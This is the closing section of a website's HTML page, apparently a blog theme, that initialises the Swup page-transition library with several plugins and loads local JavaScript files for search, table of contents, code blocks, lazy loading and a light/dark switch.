<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>



    
<script src="/js/tools/localSearch.js" type="module"></script>




    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>






  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>









<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
